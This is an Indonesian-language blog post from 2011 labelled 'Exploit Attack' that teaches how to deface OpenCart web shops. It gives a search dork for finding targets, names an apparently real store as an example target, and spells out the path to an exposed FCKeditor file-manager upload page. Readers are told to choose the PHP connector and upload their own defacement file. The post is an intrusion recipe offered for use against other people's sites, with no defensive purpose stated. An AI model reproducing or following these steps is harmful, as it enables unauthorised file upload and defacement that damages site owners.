[+] Post Title :
[+] Date : Selasa, 17 Mei 2011
[+] Author : rozi inside
[+] Link : https://datalunars.blogspot.com/2011/05/remote-file-upload-opencart-deface.html
[+] Type : Exploit Attack
dork : Powered By OpenCart site:comRemote File Upload Opencart (deface)
[+] Date : Selasa, 17 Mei 2011
[+] Author : rozi inside
[+] Link : https://datalunars.blogspot.com/2011/05/remote-file-upload-opencart-deface.html
[+] Type : Exploit Attack
"site:" terserah, yang penting support opencart
ex target:
http://www.harleypartsintl.com/
bisa juga dgn trget www.target.com/pacth/ itu kalo dpt trget yg ad di /patch/ nya
ex:
http://www.target.com/patch/
nah kalo dh dpt trget, lngsung aj kita inject exploitnya
for exploit :
Quote:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jdi nya gni
ex:
http://www.harleypartsintl.com/admin/vie.../test.html
kalo target yang ad /patch/ , inject nya d belakang patch nya
ex:
www.target.com/patch/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
liat yg kluar, dstu trdpat tmpat upload file nya.....
connector pilih PHP
lngsung aja kita upload file html deface kita...
jika berhasil mka akan kluar alert sprti ini
"file uploaded with no errors"
liat file kita , apkah telah d upload dgn mengklik "Get Folders and Files"
skrng liat hasilnya....
0 komentar:
Posting Komentar
Komentar anda Hanyalah Sebagian Dari Kritikan Anda
Dan tidak lebih, NOT SARA , NOT Burn....
Komentar lah dengan baik dan sopan.. maka saya akan
baik kepada anda....
"[R]ozi inSide]